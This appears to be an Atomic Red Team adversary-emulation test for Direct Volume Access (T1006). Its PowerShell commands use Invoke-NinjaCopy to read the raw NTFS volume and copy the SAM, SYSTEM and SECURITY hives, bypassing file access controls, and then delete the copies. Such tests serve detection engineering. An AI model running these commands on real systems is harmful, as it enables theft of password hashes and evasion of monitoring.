Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)
This test uses PowerShell to copy files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1)
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| sam_binary_path | Path of the SAM file | string | C:\Windows\System32\config\sam |
| system_binary_path | Path of the SYSTEM file | string | C:\Windows\System32\config\system |
| security_binary_path | Path of the SECURITY file | string | C:\Windows\System32\config\security |
| output_folder | Output folder path | Path | C:\Windows\Temp |
. $PathToAtomicsFolder\T1006\src\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system"
Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
rm "#{output_folder}\sam"
rm "#{output_folder}\system"
rm "#{output_folder}\security"